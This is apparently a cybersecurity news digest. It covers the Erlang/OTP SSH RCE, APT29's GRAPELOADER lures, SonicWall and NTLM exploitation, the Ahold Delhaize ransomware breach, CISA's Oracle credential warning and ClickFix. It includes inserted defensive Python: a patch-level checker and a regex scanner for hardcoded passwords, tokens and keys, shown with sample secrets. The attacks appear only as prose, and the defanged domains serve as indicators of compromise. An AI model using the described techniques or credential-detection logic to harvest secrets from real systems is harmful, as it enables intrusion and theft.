CyberSecurity news


info@thehackernews.com (The Hacker News) //
A critical security vulnerability, CVE-2025-32433, has been discovered in the Erlang/OTP SSH implementation, potentially allowing unauthenticated remote code execution (RCE). The flaw, which has been assigned a maximum CVSS score of 10.0, could enable attackers to execute arbitrary code on affected systems without providing any credentials. Researchers at Ruhr University Bochum, including Fabian Bäumer, Marcus Brinkmann, Marcel Maehren, and Jörg Schwenk, identified the vulnerability. It stems from improper handling of SSH protocol messages, allowing attackers to send connection protocol messages prior to authentication, leading to a complete system compromise if the SSH daemon is running with root privileges.

The vulnerability affects all users running an SSH server based on the Erlang/OTP SSH library. According to the official Ericsson security advisory, any application providing SSH access using the Erlang/OTP SSH library should be considered affected. This vulnerability poses a significant risk, especially to critical infrastructure and high-availability systems where Erlang/OTP is widely used, such as in telecommunications equipment, industrial control systems, and connected devices. Expert Mayuresh Dani of Qualys emphasizes the critical nature, noting Erlang's frequent installation on high-availability systems. This vulnerability could allow actions such as installing ransomware or siphoning off sensitive data.

Proof-of-concept (PoC) exploits for CVE-2025-32433 have already been released, increasing the urgency for organizations to take immediate action. SecurityOnline reported the release of PoC code, and the Horizon3 Attack Team confirmed they had developed their own exploit, describing it as "surprisingly easy" to reproduce. Mitigation strategies include immediately updating to the patched versions: OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20. As a temporary workaround, it is recommended to disable the SSH server or restrict access via firewall rules until the updates can be applied. Organizations should evaluate their systems for potential compromise.
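To turn the patched-version list above into a check a defender can run against an installed release, here is an added Python example (not from the Ericsson advisory or from Erlang/OTP itself). It compares a version string such as OTP-26.2.5.9 against the first fixed release of its line; the helper that reads the full version assumes the usual releases/<major>/OTP_VERSION layout of an OTP installation.

```python
"""Check an Erlang/OTP version string against the CVE-2025-32433 fixed releases."""
from __future__ import annotations

import os
import re
from typing import Optional

# First fixed release of each line, as listed in the summary above:
# OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20.
FIXED_RELEASES: dict[int, tuple[int, ...]] = {
    27: (27, 3, 3),
    26: (26, 2, 5, 11),
    25: (25, 3, 2, 20),
}

# Accepts "OTP-26.2.5.9", "OTP 26.2.5.9", "OTP_26.2.5.9" or a bare "26.2.5.9".
_VERSION_RE = re.compile(r"^(?:OTP[-_ ]?)?(\d+(?:\.\d+)*)$")


def parse_otp_version(text: str) -> tuple[int, ...]:
    """Parse an OTP version string into a tuple of integers."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised OTP version string: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def _compare(a: tuple[int, ...], b: tuple[int, ...]) -> int:
    """Compare version tuples of unequal length by right-padding with zeros,
    so that 26.2.5 is treated as 26.2.5.0 (older than 26.2.5.11)."""
    n = max(len(a), len(b))
    a2 = a + (0,) * (n - len(a))
    b2 = b + (0,) * (n - len(b))
    return (a2 > b2) - (a2 < b2)


def assess(version: str) -> str:
    """Classify a version as patched, vulnerable, affected (no fix listed) or unknown."""
    v = parse_otp_version(version)
    fixed = FIXED_RELEASES.get(v[0])
    if fixed is None:
        if v[0] < min(FIXED_RELEASES):
            # The advisory treats every Erlang/OTP SSH server as affected and lists
            # no fix for older lines, so the only remedy is moving to a patched line.
            return "affected (no fixed release listed for this line; upgrade to a patched line)"
        return "unknown (release line not covered by the listed fixes; check the Ericsson advisory)"
    if _compare(v, fixed) >= 0:
        return "patched"
    return "vulnerable (upgrade to OTP-" + ".".join(map(str, fixed)) + ")"


def installed_otp_version(root_dir: str, otp_release: str) -> Optional[str]:
    """Read the full version string from <root_dir>/releases/<otp_release>/OTP_VERSION.

    root_dir and otp_release are the values of code:root_dir() and
    erlang:system_info(otp_release) on the host being checked (assumed layout).
    Returns None when the file is absent.
    """
    path = os.path.join(root_dir, "releases", otp_release, "OTP_VERSION")
    try:
        with open(path, encoding="ascii") as fh:
            return fh.read().strip()
    except OSError:
        return None


if __name__ == "__main__":
    for sample in ("OTP-26.2.5.9", "OTP-26.2.5.11", "OTP-27.3", "25.3.2.20", "24.3.4"):
        print(f"{sample:>14}: {assess(sample)}")
```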

Recommended read:
References :
  • darkwebinformer.com: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • hackread.com: Researchers Find CVSS 10.0 Severity RCE Vulnerability in Erlang/OTP SSH
  • Open Source Security: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • Ubuntu security notices: USN-7443-1: Erlang vulnerability
  • BleepingComputer: Critical Erlang/OTP SSH pre-auth RCE is 'Surprisingly Easy' to exploit, patch now
  • The Hacker News: TheHackerNews Article about CVSS 10.0 in Erlang/OTP SSH
  • The DefendOps Diaries: Explore the critical CVE-2025-32433 vulnerability in Erlang/OTP SSH, its impact, and mitigation strategies.
  • github.com: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • www.bleepingcomputer.com: Critical Erlang/OTP SSH pre-auth RCE is 'Surprisingly Easy' to exploit, patch now
  • securityonline.info: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • www.openwall.com: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • Resources-2: Picus Security Blog on Erlang/OTP SSH RCE
  • Tenable Blog: Proof-of-concept code has been released after researchers disclosed a maximum severity remote code execution vulnerability in Erlang/OTP SSH. Successful exploitation could allow for complete takeover of affected devices. Background On April 16, Fabian Bäumer, Marcus Brinkmann, Marcel Maehren, and Jörg Schwenk of the Ruhr University Bochum in Germany disclosed a critical vulnerability in Erlang/OTP SSH to the vulnerability mailing list.
  • securityonline.info: SecurityOnline article on Erlang/OTP CVE-2025-32433 (CVSS 10): Critical SSH Flaw Allows Unauthenticated RCE
  • Security Risk Advisors: Unauthenticated Remote Code Execution in Erlang/OTP SSH (CVE-2025-32433).
  • securityonline.info: Erlang/OTP SSH Vulnerability (CVE-2025-32433).
  • Open Source Security: Re: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • www.runzero.com: Discusses an SSHamble with remote code execution in Erlang/OTP SSH.
  • Cyber Security News: Cybersecurity News also reported this vulnerability.
  • securityboulevard.com: Vulnerability in Erlang/OTP SSH allows for unauthenticated remote code execution on vulnerable devices.
  • The DefendOps Diaries: Understanding and Mitigating CVE-2025-32433: A Critical Erlang/OTP Vulnerability
  • www.scworld.com: Maximum severity flaw impacts Erlang/OTP SSH Widely used library Erlang/OTP SSH was discovered to be affected by a maximum severity flaw, tracked as CVE-2025-32433, which could be leveraged to allow code execution without required logins, according to Hackread.
  • Open Source Security: Seclists Details on SSH execution in Erlang
  • Blog: CyberReason article on Erlang/OTP RCE Vulnerability.
  • infosecwriteups.com: InfoSec Writeups: Erlang/OTP SSH CVSS 10 RCE
  • securityboulevard.com: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • www.bleepingcomputer.com: Critical Erlang/OTP SSH RCE bug now has public exploits, patch now
  • industrialcyber.co: Frenos warns OT sector of critical Erlang vulnerability enabling remote code execution affecting millions of devices
  • www.cybersecuritydive.com: Researchers warn of critical flaw found in Erlang OTP SSH
  • Arctic Wolf: CVE-2025-32433: Maximum Severity Unauthenticated RCE Vulnerability in Erlang/OTP SSH
  • arcticwolf.com: CVE-2025-32433: Maximum Severity Unauthenticated RCE Vulnerability in Erlang/OTP SSH
  • Industrial Cyber: Frenos warns OT sector of critical Erlang vulnerability enabling remote code execution affecting millions of devices
  • www.csoonline.com: Public exploits already available for a severity 10 Erlang SSH vulnerability; patch now

info@thehackernews.com (The Hacker News) //
APT29, a Russian state-sponsored hacking group also known as Cozy Bear or Midnight Blizzard, is actively targeting European diplomatic entities with a sophisticated phishing campaign that began in January 2025. The group is using deceptive emails disguised as invitations to wine-tasting events to entice recipients into downloading a malicious ZIP file. This archive, often named "wine.zip," contains a legitimate PowerPoint executable alongside malicious DLL files designed to compromise the victim's system. These campaigns appear to focus primarily on Ministries of Foreign Affairs, as well as other countries' embassies in Europe, with indications suggesting that diplomats based in the Middle East may also be targets.

The malicious ZIP archive contains a PowerPoint executable ("wine.exe") and two hidden DLL files. When the PowerPoint executable is run, it activates a previously unknown malware loader called GRAPELOADER through a technique known as DLL side-loading. GRAPELOADER then establishes persistence on the system by modifying the Windows Registry. It collects basic system information, such as username and computer name, and communicates with a command-and-control server to fetch additional malicious payloads. This technique allows the attackers to maintain access to the compromised systems.

GRAPELOADER distinguishes itself through its stealth techniques, including masking strings in its code and decrypting them only briefly in memory before erasing them. The malware gains persistence by modifying the Windows registry's Run key, ensuring that "wine.exe" is executed automatically every time the system reboots. The ultimate goal of the campaign is to deliver shellcode; Check Point also identified updated WINELOADER artifacts uploaded to the VirusTotal platform with compilation timestamps matching recent activity. The emails are sent from domains such as bakenhof[.]com and silry[.]com.

Recommended read:
References :
  • Check Point Blog: Details on APT29's updated phishing campaign targeting European diplomatic organizations. Focus on new malware and TTPs
  • BleepingComputer: Russian state-sponsored espionage group Midnight Blizzard is behind a new spear-phishing campaign targeting diplomatic entities in Europe, including embassies.
  • bsky.app: Midnight Blizzard deploys new GrapeLoader malware in embassy phishing
  • blog.checkpoint.com: Unmasking APT29: The Sophisticated Phishing Campaign Targeting European Diplomacy
  • cyberpress.org: Detailed report about APT29's GRAPELOADER campaign targeting European diplomats.
  • research.checkpoint.com: Renewed APT29 Phishing Campaign Against European Diplomats
  • Cyber Security News: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
  • The Register - Security: Russians lure European diplomats into malware trap with wine-tasting invite
  • iHLS: Russian Phishing Campaign Steals Sensitive Data in European Government Networks
  • cybersecuritynews.com: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
  • www.scworld.com: New APT29 spear-phishing campaign targets European diplomatic organizations
  • www.helpnetsecurity.com: Cozy Bear targets EU diplomats with wine-tasting invites (again)
  • Check Point Research: Renewed APT29 Phishing Campaign Against European Diplomats
  • Help Net Security: Detailed report on the campaign's tactics, techniques, and procedures, including the use of fake wine-tasting invitations.
  • securityonline.info: Sophisticated phishing campaign targeting European governments and diplomats, using a wine-themed approach
  • securityonline.info: APT29 Targets European Diplomats with Wine-Themed Phishing
  • www.csoonline.com: The tactics, techniques, and procedures (TTPs) observed in this campaign bear strong similarities to those seen in the previous WINELOADER campaign from March 2024, The report contains indicators of compromise such as file names, file hashes and C2 URLs that can be used by security teams to build detections and threat hunting queries.
  • Virus Bulletin: The campaign employs a new loader, called GRAPELOADER, which is downloaded via a link in the phishing email.
  • The Hacker News: The Hacker News reports on APT29 targeting European diplomats with wine-themed phishing emails and the GrapeLoader malware.
  • hackread.com: Russian Cozy Bear’s Wine Lure Drops WineLoader Malware on EU Diplomats
  • ciso2ciso.com: Midnight Blizzard Targets European Diplomats with Wine Tasting Phishing Lure – Source: www.infosecurity-magazine.com
  • ciso2ciso.com: APT29 Targets European Diplomats with Wine-Themed Phishing
  • thehackernews.com: The Russian state-sponsored threat actor known as APT29 has been linked to an advanced phishing campaign that's targeting diplomatic entities across Europe with a new variant of WINELOADER and a previously unreported malware loader codenamed GRAPELOADER.
  • www.techradar.com: European diplomats targeted by Russian phishing campaign promising fancy wine tasting
  • Talkback Resources: Talkback.sh discusses APT29 Deploys GRAPELOADER Malware Targeting European Diplomats Through Wine-Tasting Lures [mal]
  • Talkback Resources: Russian Cozy Bear’s Wine Lure Drops WineLoader Malware on EU Diplomats [social] [mal]
  • securityaffairs.com: Russia-linked group APT29 targeted diplomatic entities across Europe with a new malware loader codenamed GRAPELOADER.
  • eSecurity Planet: Russian Hackers Target European Diplomats with ‘Wine-Tasting’ Phishing Scams
  • www.esecurityplanet.com: Russian Hackers Target European Diplomats with ‘Wine-Tasting’ Phishing Scams
  • Security Risk Advisors: Russia-Linked APT29 Targets European Diplomats with New GRAPELOADER Malware in Sophisticated Phishing Campaign
  • ciso2ciso.com: Russia-linked APT29 targets European diplomatic entities with GRAPELOADER malware – Source: securityaffairs.com

info@thehackernews.com (The Hacker News) //
Since January 2025, threat actors have been actively exploiting a remote code execution vulnerability, CVE-2021-20035, in SonicWall Secure Mobile Access (SMA) appliances. This exploitation campaign targets the SMA100 management interface, allowing for OS command injection. Arctic Wolf researchers have been tracking this campaign, highlighting the significant risk it poses to organizations utilizing these affected devices due to the potential for credential access.

This vulnerability has now been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, underscoring the severity and ongoing nature of the threat. CISA urges prompt remediation by affected organizations. In addition to CVE-2021-20035, CISA has flagged another critical vulnerability, CVE-2024-53704, which compromises the SSL VPN authentication mechanism in SonicOS. This flaw, with a CVSS score of 9.3, enables attackers to hijack VPN sessions by sending crafted session cookies, bypassing multi-factor authentication and exposing private network routes.

CISA has issued a critical security alert urging federal agencies and network defenders to prioritize patching both CVE-2021-20035 and CVE-2024-53704 to prevent potential breach attempts. The Binding Operational Directive (BOD) 22-01 mandates that Federal Civilian Executive Branch (FCEB) agencies secure their networks against ongoing attacks within a specified timeframe. While this directive specifically targets U.S. federal agencies, CISA advises all network defenders to take immediate action to mitigate these risks.

Recommended read:
References :
  • chemical-facility-security-news.blogspot.com: CISA Adds SonicWall Vulnerability to KEV Catalog – 4-16-25
  • securityaffairs.com: U.S. CISA adds SonicWall SMA100 Appliance flaw to its Known Exploited Vulnerabilities catalog
  • The Hacker News: Details on the exploitation of the vulnerability
  • Cyber Security News: CISA Alerts on Exploited SonicWall Command Injection Vulnerability
  • gbhackers.com: CISA Issues Alert on SonicWall Flaw Being Actively Exploited
  • BleepingComputer: On Wednesday, CISA warned federal agencies to secure their SonicWall Secure Mobile Access (SMA) 100 series appliances against attacks exploiting a high-severity remote code execution vulnerability. [...]
  • gbhackers.com: GBHackers: CISA Issues Alert on SonicWall Flaw Being Actively Exploited
  • securityonline.info: CISA Alert: Actively Exploited SonicWall SMA100 Vulnerability
  • The DefendOps Diaries: CISA flags critical SonicWall vulnerabilities: Urgent mitigation required to prevent cyber attacks
  • www.cybersecuritydive.com: Older SonicWall SMA100 vulnerability exploited in the wild
  • Arctic Wolf: Credential Access Campaign Targeting SonicWall SMA Devices Potentially Linked to Exploitation of CVE-2021-20035
  • Help Net Security: Sonicwall SMA100 vulnerability exploited by attackers (CVE-2021-20035)
  • Arctic Wolf: On April 15, 2025, SonicWall published a product notice regarding CVE-2021-20035, a vulnerability impacting SonicWall SMA 100 series appliances.
  • arcticwolf.com: On 15 April 2025, SonicWall published a product notice regarding CVE-2021-20035, a vulnerability impacting SonicWall SMA 100 series appliances.
  • The DefendOps Diaries: Understanding and Mitigating the SonicWall SMA Vulnerability
  • BleepingComputer: SonicWall SMA VPN devices targeted in attacks since January
  • bsky.app: A remote code execution vulnerability affecting SonicWall Secure Mobile Access (SMA) appliances has been under active exploitation since at least January 2025, according to cybersecurity company Arctic Wolf.
  • www.scworld.com: Cybersecurity Dive reports that active exploitation of the nearly half a decade-old high-severity SonicWall SMA100 remote-access appliance operating system command injection flaw
  • www.helpnetsecurity.com: Sonicwall SMA100 vulnerability exploited by attackers (CVE-2021-20035)
  • securityaffairs.com: CISA adds SonicWall SMA100 Appliance flaw to its Known Exploited Vulnerabilities catalog.
  • Help Net Security: CVE-2021-20035, an old vulnerability affecting Sonicwall Secure Mobile Access (SMA) 100 series appliances, is being exploited by attackers.
  • arcticwolf.com: Details the credential access campaign targeting SonicWall SMA devices and its potential link to CVE-2021-20035 exploitation.
  • securityaffairs.com: Threat actors are actively exploiting a remote code execution flaw in SonicWall Secure Mobile Access (SMA) appliances since January 2025.
  • securityaffairs.com: Security Affairs newsletter reports attackers exploited SonicWall SMA appliances since January 2025
  • www.bleepingcomputer.com: SonicWall SMA VPN devices targeted in attacks since January

Zeljka Zorz@Help Net Security //
Microsoft is warning Windows users about an actively exploited vulnerability, CVE-2025-24054, which allows attackers to capture NTLMv2 responses. This can lead to the leakage of NTLM hashes and potentially user passwords, compromising systems. The vulnerability is exploited through phishing attacks that deliver maliciously crafted .library-ms files; minimal interaction with such a file, such as right-clicking it, dragging and dropping it, or simply navigating to the folder that contains it, is enough to trigger the exploit. The original version of the protocol, NTLMv1, had several security flaws that made it vulnerable to attacks such as pass-the-hash and rainbow table attacks.

Attackers have been actively exploiting CVE-2025-24054 since March 19, 2025, even though Microsoft released a patch on March 11, 2025. Active exploitation has been observed in campaigns targeting government entities and private institutions in Poland and Romania between March 20 and 21, 2025. The campaign used phishing emails carrying a Dropbox link to an archive file that exploits the vulnerability and harvests NTLMv2-SSP hashes.

The captured NTLMv2 response can be leveraged by attackers for offline brute-force attacks or for NTLM relay attacks, a form of man-in-the-middle attack. NTLM relay attacks are far more dangerous when the stolen credentials belong to a privileged user, because the attacker can use them for privilege escalation and lateral movement on the network. Microsoft released a patch on March 11, 2025 addressing the vulnerability, and users are advised to apply it.

Recommended read:
References :
  • Check Point Research: CVE-2025-24054, NTLM Exploit in the Wild
  • The DefendOps Diaries: Understanding the CVE-2025-24054 Vulnerability: A Critical Threat to Windows Systems
  • BleepingComputer: Windows NTLM hash leak flaw exploited in phishing attacks on governments
  • bsky.app: Windows NTLM hash leak flaw exploited in phishing attacks on governments
  • research.checkpoint.com: CVE-2025-24054, NTLM Exploit in the Wild
  • Talkback Resources: Research team analysis of CVE-2025-24054
  • Help Net Security: Windows NTLM vulnerability exploited in multiple attack campaigns (CVE-2025-24054)
  • www.helpnetsecurity.com: Windows NTLM vulnerability exploited in multiple attack campaigns (CVE-2025-24054)
  • bsky.app: BSky Post on CVE-2025-24054, NTLM Exploit in the Wild
  • Cyber Security News: CyberSecurityNews - Hackers Exploiting Windows NTLM Spoofing Vulnerability in Wild to Compromise Systems
  • The Hacker News: CVE-2025-24054 Under Active Attack—Steals NTLM Credentials on File Download
  • MSSP feed for Latest: Windows NTLM Hash Flaw Targeted in Global Phishing Attacks
  • gbhackers.com: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) alerted organizations to active exploitation of a newly disclosed Microsoft Windows vulnerability tracked as CVE-2025-24054.
  • infosecwriteups.com: Your NTLM Hashes at Risk: Inside CVE‑2025‑24054
  • BetaNews: CISA adds Windows NTLM hash disclosure spoofing flaw to its Known Exploited Vulnerabilities Catalog
  • www.scworld.com: Cybersecurity News reports on alarms sounding over attacks via Microsoft NTLM vulnerability, impacting Poland and Romania.
  • securityaffairs.com: U.S. CISA adds Apple products and Microsoft Windows NTLM flaws to its Known Exploited Vulnerabilities catalog
  • gbhackers.com: CISA Warns of Active Exploitation of Windows NTLM Vulnerability
  • Techzine Global: Windows vulnerability with NTLM hash abuse exploited for phishing
  • betanews.com: CISA adds Windows NTLM hash disclosure spoofing flaw to its Known Exploited Vulnerabilities Catalog
  • ciso2ciso.com: Fresh Windows NTLM Vulnerability Exploited in Attacks – Source: www.securityweek.com
  • malware.news: Phishing campaigns abuse Windows NTLM hash leak bug

@x.com //
Ahold Delhaize, the multinational retail and wholesale company with operations in both Europe and the United States, has confirmed a data breach following a cyberattack in November 2024. The company, which owns supermarket brands such as Stop & Shop, Giant Food, Food Lion and Hannaford, acknowledged that certain files were stolen from its U.S. business systems. The breach was claimed by the INC ransomware group, which has threatened to release sensitive information if its demands are not met, according to researchers at Arctic Wolf. The company is currently working with outside forensics experts to determine the exact nature of the compromised data and to comply with legal obligations regarding disclosure to affected individuals.

The cyberattack disrupted e-commerce operations, particularly affecting Hannaford's pickup and delivery services, which were halted for several days. Other U.S. banners also experienced disruptions and reduced availability for e-commerce services due to "system outages." While physical stores remained open and continued to accept most payment methods, including credit cards, Ahold Delhaize took some systems offline to protect them. The company also notified and updated law enforcement about the incident.

The INC ransomware group claims to have exfiltrated approximately 6 terabytes of data from Ahold Delhaize's U.S. division. This data includes sensitive documents and personal identifiers, raising concerns about potential misuse and privacy violations. Ahold Delhaize is advising customers to be vigilant for phishing attempts and fraudulent activity. The company is currently investigating the extent of the breach and is committed to taking necessary measures to contain the situation and prevent further unauthorized access.

Recommended read:
References :
  • The DefendOps Diaries: Ahold Delhaize Cyberattack: A Deep Dive into the Ransomware Breach
  • BleepingComputer: Ahold Delhaize confirms data theft after INC ransomware claims attack
  • www.cybersecuritydive.com: Ahold Delhaize confirms data stolen after threat group claims credit for November attack
  • www.scworld.com: Data breach confirmed by Ahold Delhaize after INC ransomware claims
  • Cyber Security News: Ahold Delhaize data breach in November 2024.
  • bsky.app: Food retail giant Ahold Delhaize confirms that data was stolen from its U.S. business systems during a November 2024 cyberattack.
  • gbhackers.com: GBHackers articles about Ahold Data stolen
  • www.techradar.com: Food retail giant behind several major US supermarket brands confirms data stolen in major ransomware breach
  • thecyberexpress.com: Ahold Delhaize USA, the parent company of several well-known American supermarket brands, has confirmed that data was stolen during a cyberattack that took place in the fall of 2024.
  • newsroom.aholddelhaize.com: Ahold Delhaize updates statement on Nov. 8, 2024 cybersecurity issue
  • Check Point Research: For the latest discoveries in cyber research for the week of 21st April, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Retail giant Ahold Delhaize has suffered a cyber-attack resulting in data theft of customer information from its US business systems. The attack, claimed by ransomware group INC Ransom, impacted Ahold Delhaize USA […]
  • eSecurity Planet: Retail giant Ahold Delhaize has suffered a cyber-attack resulting in data theft of customer information from its US business systems.
  • thecyberexpress.com: The INC Ransom gang claimed responsibility for the cyberattack on Ahold Delhaize.
  • Davey Winder: Ahold Delhaize USA, the parent company of several well-known American supermarket brands, has confirmed that data was stolen during a cyberattack that took place in the fall of 2024.

David Jones@cybersecuritydive.com //
The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning on April 17, 2025, regarding increased breach risks following a potential compromise of legacy Oracle Cloud servers. This alert comes in response to public reporting of alleged threat activity targeting Oracle customers, though the scope and impact of the activity are currently unconfirmed. CISA's guidance urges organizations and individuals to take immediate steps to secure their IT environments amid claims of a large trove of customer credentials being compromised. The agency is also asking organizations to come forward if they detect suspicious activity or other evidence of a compromise.

CISA is particularly concerned about situations where credential material may be exposed, reused across separate and unaffiliated systems, or embedded into applications and tools. Embedded credential material, which can be hardcoded into scripts, applications, infrastructure templates, or automation tools, is especially difficult to detect and can enable long-term unauthorized access if exposed. The compromise of credentials like usernames, emails, passwords, authentication tokens, and encryption keys can pose a significant risk to enterprise environments.

To mitigate these risks, CISA recommends organizations reset passwords for known affected users, especially those not federated through enterprise identity solutions. Additionally, they should review source code, infrastructure as code templates, automation scripts, and configuration files for hardcoded credentials, replacing them with secure authentication methods supported by centralized secret management. Monitoring authentication logs for anomalous activity, particularly using privileged, service, or federated identity accounts, is also crucial. Finally, CISA advises enforcing phishing-resistant multi-factor authentication for all user and administrator accounts whenever possible.
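As an added example of the hardcoded-credential review CISA recommends above (illustrative code, not CISA's or Oracle's), the Python below scans text from scripts, infrastructure-as-code templates and configuration files for inline secrets while skipping references to environment variables, template variables and secret stores. The sample input is constructed for the example.

```python
"""Flag hardcoded credential material in source, IaC and config text."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int
    kind: str
    snippet: str


# Assignment-style secrets: db_password = "...", api_key: ..., TOKEN=...
# The lazy prefix lets keys like db_password or admin_password match.
_ASSIGNMENT = re.compile(
    r"""
    (?P<key>[\w.-]*?(?P<base>password|passwd|pwd|secret|api[_-]?key|access[_-]?key|token|private[_-]?key)[\w.-]*)
    \s*[:=]\s*
    (?P<quote>["']?)(?P<value>[^"'\s]{6,})(?P=quote)
    """,
    re.IGNORECASE | re.VERBOSE,
)

# Values that reference a secret store, environment or template variable, or are
# obvious placeholders: these are what the review should find, not secrets.
_PLACEHOLDER = re.compile(
    r"^(\$\{?[A-Z_]+\}?|\{\{.*\}\}|os\.environ.*|<[^>]+>|\*+|x{4,}|changeme|example)$",
    re.IGNORECASE,
)

# Patterns that carry the secret inline regardless of the key name.
_INLINE = [
    ("private_key_block", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    ("url_with_password", re.compile(r"[a-z][a-z0-9+.-]*://[^/\s:]+:[^@\s]+@", re.IGNORECASE)),
    ("bearer_token", re.compile(r"\bBearer\s+[A-Za-z0-9._\-]{20,}", re.IGNORECASE)),
]


def scan_text(text: str) -> list[Finding]:
    """Return one Finding per line that embeds credential material."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for kind, pattern in _INLINE:
            if pattern.search(line):
                findings.append(Finding(line_no, kind, line.strip()))
                break
        else:
            m = _ASSIGNMENT.search(line)
            if m and not _PLACEHOLDER.match(m.group("value")):
                base = m.group("base").lower().replace("-", "_")
                findings.append(Finding(line_no, f"hardcoded_{base}", line.strip()))
    return findings


# Constructed sample: lines as they might appear in a config file, a shell
# script, an application source file and an IaC template.
SAMPLE = """\
# constructed sample input for the scanner
db_password = "S3cr3t-Pa55"
api_key: ${ORACLE_API_KEY}
export TOKEN=os.environ["TOKEN"]
url = "https://svc_user:Hunter2!@db.internal.example/orders"
auth_token = "<redacted>"
resource "db" { admin_password = "admin123" }
-----BEGIN RSA PRIVATE KEY-----
"""


if __name__ == "__main__":
    for f in scan_text(SAMPLE):
        print(f"line {f.line_no}: {f.kind}: {f.snippet}")
```

Lines 3, 4 and 6 of the sample are the pattern the review should leave in place (a variable reference or a redacted placeholder); the other four are what needs replacing with a secret manager or federated identity.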

Recommended read:
References :
  • DataBreaches.Net: Sergiu Gatlan reports: On Wednesday, CISA warned of heightened breach risks after the compromise of legacy Oracle Cloud servers earlier this year and highlighted the significant threat to enterprise networks. CISA said, “the nature of the reported activity presents potential risk to organizations and individuals, particularly where credential material may be exposed, reused across separate,...
  • BleepingComputer: On Wednesday, CISA warned of heightened breach risks after the compromise of legacy Oracle Cloud servers earlier this year and highlighted the significant threat to enterprise networks.
  • www.cybersecuritydive.com: The agency is asking organizations to come forward if they detect suspicious activity or other evidence of a compromise.
  • MSSP feed for Latest: Legacy Oracle cloud breach poses credential exposure risk
  • hackread.com: Following reports of unauthorized access to a legacy Oracle cloud environment, CISA warns of potential credential compromise leading…
  • www.scworld.com: Secure legacy Oracle cloud credentials amid leak reports, CISA warns
  • www.itpro.com: CISA issues warning in wake of Oracle cloud credentials leak
  • securityonline.info: CISA Warns of Credential Risks Tied to Oracle Cloud Breach
  • The Register - Security: Oracle hopes talk of cloud data theft dies off. CISA just resurrected it for Easter
  • The DefendOps Diaries: Understanding the Oracle Cloud Breach: CISA's Guidance and Recommendations
  • ciso2ciso.com: CISA Urges Action on Potential Oracle Cloud Credential Compromise
  • ciso2ciso.com: Following reports of unauthorized access to a legacy Oracle cloud environment, CISA warns of potential credential compromise leading to phishing, network breaches, and data theft.

@gbhackers.com //
State-sponsored hacking groups from North Korea, Iran, and Russia are now widely employing the ClickFix social engineering tactic in their espionage campaigns. This technique, previously associated with cybercriminals, involves tricking users into copying, pasting, and running malicious commands, often through fake error messages and instructions. Proofpoint researchers first documented this shift over a three-month period from late 2024 to early 2025, noting that ClickFix has become an effective means of bypassing traditional security measures. This tactic replaces installation and execution stages in existing infection chains.

The adoption of ClickFix has been observed in various campaigns, each tailored to the specific objectives and targets of the respective state-sponsored actors. For instance, the North Korean actor TA427, also known as Kimsuky, utilized ClickFix in phishing campaigns targeting think tanks involved in North Korean affairs. By impersonating diplomatic personnel and leveraging spoofed document sharing platforms, TA427 successfully deployed the Quasar RAT, a remote access trojan. Meanwhile, Iranian group TA450 (MuddyWater) targeted organizations in the Middle East by masquerading as Microsoft security updates, deploying remote management tools for espionage and data exfiltration.

Russian-linked groups, including UNK_RemoteRogue and TA422 (APT28), have also experimented with ClickFix, indicating its growing appeal across different nation-state actors. The simplicity and effectiveness of ClickFix, which relies on user interaction rather than sophisticated technical exploits, make it a valuable tool for these groups. While not all groups have persistently used ClickFix after initial tests, its adoption by multiple state-sponsored actors underscores the evolving threat landscape and the need for heightened vigilance against social engineering tactics. This trend suggests that ClickFix, and similar user-interactive attack methods, will continue to pose a significant threat in the future.

Recommended read:
References :
  • gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • The Hacker News: Multiple state-sponsored hacking groups from Iran, North Korea, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to deploy malware
  • www.scworld.com: Attacks leveraging the ClickFix social engineering technique have been increasingly conducted by state-backed threat operations to facilitate malware infections over the past few months, reports The Hacker News.
  • www.bleepingcomputer.com: State-sponsored hackers embrace ClickFix social engineering tactic
  • cyberpress.org: State-Sponsored Hackers Widely Deploy ClickFix Attack in Espionage Campaigns
  • cybersecuritynews.com: State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • Cyber Security News: State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • Cyber Security News: State Sponsored Hackers Widely Deploy ClickFix Attack in Espionage Campaigns
  • www.techradar.com: State-sponsored actors spotted using ClickFix hacking tool developed by criminals
  • BleepingComputer: ClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks.
  • securityonline.info: State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
  • hackread.com: State-Backed Hackers from North Korea, Iran and Russia Use ClickFix in New Espionage Campaigns
  • hackread.com: North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks
  • sra.io: Beware of ClickFix: A Growing Social Engineering Threat
  • The DefendOps Diaries: The Rise of ClickFix: A New Social Engineering Threat
  • Anonymous: ClickFix attacks are gaining traction among threat actors, with multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia adopting the technique in recent espionage campaigns.

@poliverso.org //
